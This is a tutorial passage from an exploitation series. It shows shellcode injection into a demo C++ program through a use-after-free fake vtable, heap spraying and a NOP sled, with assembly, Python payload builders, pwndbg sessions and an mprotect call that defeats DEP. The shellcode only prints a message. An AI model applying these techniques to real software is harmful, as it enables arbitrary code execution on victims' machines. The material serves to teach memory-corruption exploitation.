So far, we haven’t injected any code of our own into the program; we only used a routine that the program already contained. As I have mentioned, this is normally not a realistic scenario, so we will now ditch the routine and see how we can inject our own code.
First off, the injected code must be self-contained and position-independent; that is, it must be able to run from any location in memory and must not rely on anything other than system calls. This type of code is usually known as shellcode. The shellcode we will use looks like this:
Listing 2. Our shellcode
.code32
jmp l_data
l_code:
mov ebx, 2 # file descriptor, 2 = stderr
pop ecx # pointer to buffer
mov edx, 30 # buffer size
mov eax, 4 # system call number, 4 = write
int 0x80 # invoke system call
ret
l_data:
call l_code # call to push the string's address onto the stack
.asciz "\x1b[31mYou've been pwned!!!\x1b[0m\n"
The term shellcode is actually a bit misleading here as we don’t start a shell but just print a string. As you can see, the code is quite simple. First, it performs the JMP-CALL-POP trick to get the address of the string we want to print on the stack, then it invokes the write system call and returns (because it will be called as a method via the vtable). I translated the code into a raw binary (just the code, no headers and other stuff) using GNU as and objdump so that the Python script that performs the exploit can use it.
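To make the layout of that raw binary concrete, here is a minimal sketch that writes the same bytes down directly in Python. It is hand-encoded from the instructions in Listing 2 and is not taken from the actual exploit script; the names `MESSAGE` and `build_shellcode` are made up for illustration. The file descriptor is a parameter because Listing 2 uses 2 (stderr) while the disassembly in the debugger session further down shows 1.

```python
import struct

# The string printed by the shellcode; .asciz appends a terminating NUL byte.
MESSAGE = b"\x1b[31mYou've been pwned!!!\x1b[0m\n"


def build_shellcode(fd: int = 2) -> bytes:
    """Hand-assembled 32-bit x86 encoding of Listing 2 (illustrative helper)."""
    code = b"".join([
        b"\xbb" + struct.pack("<I", fd),            # mov ebx, fd
        b"\x59",                                    # pop ecx (string address)
        b"\xba" + struct.pack("<I", len(MESSAGE)),  # mov edx, buffer size
        b"\xb8" + struct.pack("<I", 4),             # mov eax, 4 (write)
        b"\xcd\x80",                                # int 0x80
        b"\xc3",                                    # ret
    ])
    # Short jump over l_code to the call at l_data.
    jmp = b"\xeb" + struct.pack("<b", len(code))
    # call rel32 back to l_code; the displacement counts from the end of the call.
    call = b"\xe8" + struct.pack("<i", -(len(code) + 5))
    return jmp + code + call + MESSAGE + b"\x00"


shellcode = build_shellcode()
```

The result is 57 bytes long, which is also the distance between the jmp instruction and the end of the buffer in the debugger session below.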
So how are we going to deliver this code to the victim program? We will use another chunk for that. But once again we need a fixed start address that we can put into the vtable, even though the start address of the chunk’s buffer is random. As you might have guessed, the heap spraying described in the previous step comes to the rescue once more. But instead of putting lots of copies of our code into the chunk (as we did with the vtable), we will use a technique known as a NOP slide (or NOP sled). You might be familiar with this technique if you know a bit about classical stack overflows.
What it means is that we will create a large chunk (again 100MB), fill it almost completely with NOP instructions and put our shellcode at the very end of it. Then we will pick an address that is guaranteed to lie within the chunk’s buffer, use it as the pointer to our code and put it into our fake vtable. This address will almost certainly point to a NOP, and when the CPU finally jumps to it, program execution will "slide" down the NOPs until it reaches the shellcode. Note that we don’t care about null bytes in the shellcode as we don’t deliver it as a string but as base64-encoded data.
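The construction of such a chunk can be sketched in a few lines of Python. This is only an illustration under assumptions: the helper name `build_nop_sled` is hypothetical, the two shellcode bytes are a stand-in, and the demo uses a tiny size instead of the 100MB from the text.

```python
import base64

NOP = b"\x90"  # single-byte x86 NOP instruction


def build_nop_sled(shellcode: bytes, total_size: int) -> bytes:
    """Pad with NOPs so that the shellcode sits at the very end of the buffer."""
    if len(shellcode) > total_size:
        raise ValueError("shellcode does not fit into the chunk")
    return NOP * (total_size - len(shellcode)) + shellcode


# Stand-in bytes only; the real payload would be the assembled shellcode.
placeholder_shellcode = b"\xeb\xfe"

# A small size keeps the demo cheap; the article uses 100MB (0x6400000 bytes).
chunk = build_nop_sled(placeholder_shellcode, 4096)

# The chunk is delivered base64-encoded, so null bytes are not a problem.
encoded = base64.b64encode(chunk)
```

Any jump that lands in the NOP region runs forward into the shellcode, so the exact landing address does not matter as long as it lies before the final bytes of the buffer.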
In the following debugger session we will take a closer look at this fourth chunk containing the code.
Listing 3. Demo of the code injection
Breakpoint 1, main () at ./uaf-overwrite-vtable.cpp:179
177 delete p_chunk;
pwndbg> x/3dx p_chunk
0x8effc40: 0xe2000000 0x78787878 0x78787878 (1)
pwndbg> x/8dx 0xe2000000
0xe2000000: 0xdbc00000 0xdbc00000 0xdbc00000 0xdbc00000 (2)
0xe2000010: 0xdbc00000 0xdbc00000 0xdbc00000 0xdbc00000
pwndbg> x/8bx 0xdbc00000
0xdbc00000: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
pwndbg> x/8i 0xdbc00000
0xdbc00000: nop (3)
0xdbc00001: nop
0xdbc00002: nop
0xdbc00003: nop
0xdbc00004: nop
0xdbc00005: nop
0xdbc00006: nop
0xdbc00007: nop
pwndbg> x/12i (0xd9b52010 + 0x6400000 - 60)
0xdff51fd4: nop
0xdff51fd5: nop
0xdff51fd6: nop
0xdff51fd7: jmp 0xdff51fec (4)
0xdff51fd9: mov ebx,0x1
0xdff51fde: pop ecx
0xdff51fdf: mov edx,0x1e
0xdff51fe4: mov eax,0x4
0xdff51fe9: int 0x80
0xdff51feb: ret
0xdff51fec: call 0xdff51fd9
0xdff51ff1: sbb ebx,DWORD PTR [ebx+0x33]
pwndbg> x/1s 0xdff51ff1
0xdff51ff1: "\033[31mYou've been pwned!!!\033[0m\n" (5)
Before we look at the fourth chunk itself, note that our overwritten object still contains a pointer into the chunk containing our fake vtables (1), although with a different value than before (0xe2000000 instead of 0xe9000000). And of course the vtable looks different now as well. It contains pointers with the value 0xdbc00000 (2). So what is there at this address? If we display the memory as instructions (3) we see lots of NOPs. So the address is apparently located somewhere in the buffer for the decoded fourth chunk, inside the NOP slide. If we examine the end of this buffer (0xd9b52010 is the start address of the buffer, conveniently printed out by the program) we find our shellcode (4) together with the string it prints (5).
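The addresses in this session can be checked with a bit of arithmetic. The following sketch uses only values that appear in Listing 3; the variable names are mine.

```python
CHUNK_SIZE = 0x6400000        # 100MB, the size of the decoded chunk
buffer_start = 0xd9b52010     # printed by the program in this run
buffer_end = buffer_start + CHUNK_SIZE
vtable_target = 0xdbc00000    # pointer value stored in the fake vtable
shellcode_start = 0xdff51fd7  # address of the jmp instruction in Listing 3

# The jump target must lie inside the buffer and before the shellcode.
assert buffer_start <= vtable_target < shellcode_start < buffer_end

# Number of NOPs the CPU executes before it reaches the shellcode.
nops_to_slide = shellcode_start - vtable_target

print(hex(buffer_end - 60), hex(nops_to_slide))  # prints 0xdff51fd4 0x4351fd7
```

The first value is the address that the x/12i command starts at, and the second shows that in this run execution would slide through roughly 67MB of NOPs before hitting the jmp.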
I arrived at these two addresses (0xe2000000 and 0xdbc00000) once again by running the program a few times and choosing values that were always included in the respective buffers. Interestingly, the buffer for the fourth chunk was always located 100MB below the buffer for the third chunk. The following diagram shows the locations of the chunks’ buffers in memory and how they relate (what points to what).
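Picking such an address amounts to intersecting the buffer ranges seen in several runs. Here is a minimal sketch of that idea, not the procedure I actually followed (I simply eyeballed the values). The function names are hypothetical, and of the three start addresses only the first one comes from the session above; the other two are made up.

```python
CHUNK_SIZE = 0x6400000  # 100MB


def common_range(starts, size):
    """Return the half-open address range covered by the buffer in every run."""
    low = max(starts)
    high = min(starts) + size
    if low >= high:
        raise ValueError("no address is covered in all runs")
    return low, high


def pick_address(starts, size, align=0x100000):
    """Pick an aligned address near the middle of the common range."""
    low, high = common_range(starts, size)
    middle = (low + high) // 2
    candidate = middle - middle % align
    if not low <= candidate < high:
        raise ValueError("no aligned address in the common range")
    return candidate


# Only the first value is from the article; the other two are invented.
observed_starts = [0xd9b52010, 0xd9a13010, 0xd9c7e010]
target = pick_address(observed_starts, CHUNK_SIZE)
```

The more the start address varies between runs, the smaller the common range gets, which is why a large chunk makes this approach reliable.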
Figure 2. Location of the chunk buffers in memory and their relation
So when the destructor is finally called on the overwritten object, via the pointer in the vtable, the CPU will jump right into the NOP slide, execute all the NOPs until it reaches the shellcode and then the shellcode itself.
Except… it doesn’t, not yet at least. Instead, the program terminates with a segmentation fault. Why is that? Another security measure employed by modern CPUs and operating systems keeps us from succeeding. It is commonly known as data execution prevention (DEP) or W^X and means that any memory regions that are writeable by a program (on the heap or stack) are by default not executable (implemented via the NX bit). As the chunk’s buffer is of course writeable, the CPU will not execute the code in it but generate an exception which leads in turn to the segmentation fault.
So how can we get around this security measure? In the third part of this series I will show you a very clever technique that works by not injecting code into the program but something else. But for now, we will just play a bit unfair and change the permissions of the chunk’s buffer. This can be done very easily in the debugger as you can see below.
Listing 4. Changing the permissions of the chunk’s buffer
pwndbg> vmmap 0xd9b52010 (1)
Start End Perm Size Offset File
0xd9b52000 0xf6e00000 rw-p 1d2ae000 0 [anon_d9b52] +0x0
pwndbg> call (long) mprotect(0xd9b52000, 0x1d2ae000, 0x7) (2)
$4 = 0
First I use the vmmap command (provided by the pwndbg extension) to check the permissions of the buffer (1) and you can see that it’s indeed not executable (it misses the "x" bit). Then I call the mprotect system call (2) to change the permissions (I don’t use the start address and size of the buffer but of the complete memory mapping, 0x7 means "rwx"). After that the exploit actually works.
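The three arguments of that call can be derived as follows. This sketch assumes 4KiB pages and the Linux values of the PROT_* flags; the helper names are hypothetical. It also shows why the buffer’s own start address would not do: mprotect requires a page-aligned address, and 0xd9b52010 is not aligned.

```python
PAGE_SIZE = 0x1000  # 4KiB pages (assumed)

# Protection flags as defined in <sys/mman.h> on Linux.
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4


def prot_from_perm(perm: str) -> int:
    """Translate a vmmap-style permission string such as 'rw-p' into PROT_* bits."""
    prot = 0
    if perm[0] == "r":
        prot |= PROT_READ
    if perm[1] == "w":
        prot |= PROT_WRITE
    if perm[2] == "x":
        prot |= PROT_EXEC
    return prot


def mprotect_args(start: int, end: int, perm: str):
    """Page-align [start, end) and return (address, length, prot) for mprotect."""
    aligned_start = start - start % PAGE_SIZE
    aligned_end = -(-end // PAGE_SIZE) * PAGE_SIZE  # round up to a page boundary
    return aligned_start, aligned_end - aligned_start, prot_from_perm(perm)


# Start and end of the mapping as reported by vmmap in Listing 4.
addr, length, prot = mprotect_args(0xd9b52000, 0xf6e00000, "rwx")
print(hex(addr), hex(length), hex(prot))  # prints 0xd9b52000 0x1d2ae000 0x7
```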
This is the end of the second article in this series. As I already said we will defeat W^X in the third article. Stay tuned if you liked it so far…